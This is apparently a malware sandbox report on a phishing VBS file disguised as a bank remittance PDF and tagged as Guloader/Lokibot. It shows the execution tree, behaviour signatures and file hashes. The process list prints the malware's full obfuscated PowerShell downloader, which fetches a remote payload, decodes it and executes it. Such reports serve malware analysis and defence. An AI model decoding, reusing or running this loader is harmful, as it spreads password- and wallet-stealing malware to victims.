Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    145s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2023, 01:13

General

  • Target

    BBVA REMITANCE PDF.vbs

  • Size

    11KB

  • MD5

    a3e1e0656418b73ed6c01a5e81cab3fe

  • SHA1

    eaf764c590b1e8bf83c6099025800cb2659c88d1

  • SHA256

    7cdead7bbbb2d7719151b78fca01d9edd4811852c14cdf3034926db09afadeff

  • SHA512

    88b2218c4d2fc0f377d4d032a281b9570dc121219d573e5a12ced33420dc48dad2528e7b4e39f974ebe6c74155dcebef9818a053312291c2a470ff25f15dbfef

  • SSDEEP

    192:UueqaOrAY2CyGlxgL4rMS2octfPVYS/1UTKeZ7AkDnA4m0H:UbqayAPbGlxg0rWtHSS/1U/tAknH

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVA REMITANCE PDF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3968
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4948
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
            PID:4484
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            4⤵
              PID:4088
            • C:\Program Files (x86)\internet explorer\ieinstal.exe
              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
              4⤵
                PID:4992
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                4⤵
                  PID:4356
                • C:\Program Files (x86)\internet explorer\ieinstal.exe
                  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                  4⤵
                    PID:1176
                  • C:\Program Files (x86)\internet explorer\ieinstal.exe
                    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                    4⤵
                      PID:2864
                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      4⤵
                        PID:2136
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        4⤵
                          PID:780
                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                          4⤵
                            PID:3692
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            4⤵
                              PID:3620
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              4⤵
                                PID:4644
                              • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                4⤵
                                  PID:1520
                                • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                  "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                  4⤵
                                    PID:4588
                                  • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                    "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                    4⤵
                                      PID:3216
                                    • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                      "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                      4⤵
                                        PID:3236
                                      • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                        4⤵
                                          PID:2936
                                        • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                          "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                          4⤵
                                            PID:4224
                                          • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                            "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                            4⤵
                                              PID:3496
                                            • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                              "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                              4⤵
                                                PID:3508
                                              • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                4⤵
                                                  PID:4768
                                                • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                  "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                  4⤵
                                                    PID:1364
                                                  • C:\Program Files (x86)\internet explorer\ExtExport.exe
                                                    "C:\Program Files (x86)\internet explorer\ExtExport.exe"
                                                    4⤵
                                                    • Checks QEMU agent file
                                                    • Accesses Microsoft Outlook profiles
                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • outlook_office_path
                                                    • outlook_win_path
                                                    PID:480

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_via5qx0b.dsy.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1013461898-3711306144-4198452673-1000\0f5007522459c86e95ffcc62f32308f1_378e8bf1-7517-4d84-8459-4934a33614da

                                              Filesize

                                              46B

                                              MD5

                                              c07225d4e7d01d31042965f048728a0a

                                              SHA1

                                              69d70b340fd9f44c89adb9a2278df84faa9906b7

                                              SHA256

                                              8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                                              SHA512

                                              23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1013461898-3711306144-4198452673-1000\0f5007522459c86e95ffcc62f32308f1_378e8bf1-7517-4d84-8459-4934a33614da

                                              Filesize

                                              46B

                                              MD5

                                              d898504a722bff1524134c6ab6a5eaa5

                                              SHA1

                                              e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                                              SHA256

                                              878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                                              SHA512

                                              26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                                            • memory/480-188-0x0000000001000000-0x0000000003216000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/480-190-0x0000000001000000-0x0000000003216000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/480-189-0x0000000001000000-0x0000000003216000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/480-184-0x0000000001000000-0x0000000003216000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/480-183-0x0000000001000000-0x0000000003216000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/3968-149-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3968-147-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3968-148-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3968-137-0x0000020EF20C0000-0x0000020EF20E2000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/3968-175-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3968-176-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/3968-174-0x0000020EF20F0000-0x0000020EF2100000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-170-0x00000000078F0000-0x0000000007986000-memory.dmp

                                              Filesize

                                              600KB

                                            • memory/4948-178-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-171-0x0000000007850000-0x0000000007872000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/4948-172-0x0000000008AE0000-0x0000000009084000-memory.dmp

                                              Filesize

                                              5.6MB

                                            • memory/4948-173-0x0000000007C80000-0x0000000007C94000-memory.dmp

                                              Filesize

                                              80KB

                                            • memory/4948-168-0x0000000007EB0000-0x000000000852A000-memory.dmp

                                              Filesize

                                              6.5MB

                                            • memory/4948-167-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-166-0x0000000006650000-0x000000000666E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/4948-177-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-169-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/4948-179-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-182-0x0000000007D20000-0x0000000007D21000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/4948-181-0x0000000009090000-0x000000000B2A6000-memory.dmp

                                              Filesize

                                              34.1MB

                                            • memory/4948-156-0x0000000005910000-0x0000000005976000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/4948-155-0x0000000005820000-0x0000000005886000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/4948-154-0x0000000005780000-0x00000000057A2000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/4948-151-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-153-0x0000000001810000-0x0000000001820000-memory.dmp

                                              Filesize

                                              64KB

                                            • memory/4948-152-0x00000000059F0000-0x0000000006018000-memory.dmp

                                              Filesize

                                              6.2MB

                                            • memory/4948-150-0x0000000001720000-0x0000000001756000-memory.dmp

                                              Filesize

                                              216KB